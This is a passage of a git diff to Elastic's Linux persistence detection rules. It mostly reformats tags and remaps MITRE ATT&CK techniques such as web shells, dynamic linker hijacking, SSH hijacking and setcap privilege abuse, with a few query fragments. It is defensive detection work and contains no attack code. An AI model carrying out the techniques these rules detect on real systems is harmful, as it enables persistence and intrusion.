-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -130,7 +139,38 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml index 6e0ad16550d..378adc56fd5 100644 --- a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml +++ b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -92,6 +92,11 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -102,10 +107,35 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml index 428eb0ddf21..7dccbc4c3f0 100644 --- a/rules/linux/persistence_setuid_setgid_capability_set.toml +++ b/rules/linux/persistence_setuid_setgid_capability_set.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -135,7 +135,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -150,6 +160,14 @@ process.name == "setcap" and process.args : "cap_set?id+ep" and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml index 4122d6985d9..da1bfc93904 100644 --- a/rules/linux/persistence_shared_object_creation.toml +++ b/rules/linux/persistence_shared_object_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -149,7 +149,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -192,46 +200,11 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["file.name", "process.name"] diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml index 64589559842..11e4f177db0 100644 --- a/rules/linux/persistence_simple_web_server_connection_accepted.toml +++ b/rules/linux/persistence_simple_web_server_connection_accepted.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -80,7 +80,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -97,30 +106,48 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" + + [[rule.threat.technique]] + id = "T1505" + name = "Server Software Component" + reference = "https://attack.mitre.org/techniques/T1505/" + + [[rule.threat.technique.subtechnique]] + id = "T1505.003" + name = "Web Shell" + reference = "https://attack.mitre.org/techniques/T1505/003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/linux/persistence_simple_web_server_creation.toml b/rules/linux/persistence_simple_web_server_creation.toml index c9053518df8..a36dadf7d26 100644 --- a/rules/linux/persistence_simple_web_server_creation.toml +++ b/rules/linux/persistence_simple_web_server_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -84,7 +84,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -106,7 +118,43 @@ id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_site_and_user_customize_file_creation.toml b/rules/linux/persistence_site_and_user_customize_file_creation.toml index 9802a00b6a8..d0ae0b7eb1f 100644 --- a/rules/linux/persistence_site_and_user_customize_file_creation.toml +++ b/rules/linux/persistence_site_and_user_customize_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -80,7 +80,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,7 +130,38 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_ssh_key_generation.toml b/rules/linux/persistence_ssh_key_generation.toml index a6266d7c8d8..e8f2c4ff724 100644 --- a/rules/linux/persistence_ssh_key_generation.toml +++ b/rules/linux/persistence_ssh_key_generation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -77,3 +77,48 @@ not file.name : "known_hosts.*" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/linux/persistence_ssh_netcon.toml b/rules/linux/persistence_ssh_netcon.toml index 70955671bcf..bde9a2bb722 100644 --- a/rules/linux/persistence_ssh_netcon.toml +++ b/rules/linux/persistence_ssh_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -114,3 +114,39 @@ reference = "https://attack.mitre.org/techniques/T1546/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml index 1a90771db07..cf09a455608 100644 --- a/rules/linux/persistence_ssh_via_backdoored_system_user.toml +++ b/rules/linux/persistence_ssh_via_backdoored_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -78,7 +78,15 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: System", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: System", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -94,37 +102,38 @@ user.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "host.id"] diff --git a/rules/linux/persistence_suspicious_file_opened_through_editor.toml b/rules/linux/persistence_suspicious_file_opened_through_editor.toml index eb4b2615df6..a3db7c8cbe3 100644 --- a/rules/linux/persistence_suspicious_file_opened_through_editor.toml +++ b/rules/linux/persistence_suspicious_file_opened_through_editor.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -96,116 +96,56 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique.subtechnique]] id = "T1037.004" name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml index 838efbe0499..793a712a67b 100644 --- a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml +++ b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -57,7 +57,16 @@ references = [ risk_score = 47 rule_id = "7afc6cc9-8800-4c7f-be6b-b688d2dea248" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -84,19 +93,27 @@ sequence by host.id with maxspan=1m framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -111,6 +128,16 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" diff --git a/rules/linux/persistence_systemd_generator_creation.toml b/rules/linux/persistence_systemd_generator_creation.toml index b706888c01e..1405518b4e7 100644 --- a/rules/linux/persistence_systemd_generator_creation.toml +++ b/rules/linux/persistence_systemd_generator_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -84,7 +84,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,11 +129,34 @@ file where host.os.type == "linux" and event.action in ("rename", "creation") an framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml index 010e0f2e8fc..3d67cd46113 100644 --- a/rules/linux/persistence_systemd_netcon.toml +++ b/rules/linux/persistence_systemd_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -82,7 +82,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -127,37 +136,6 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" @@ -168,7 +146,28 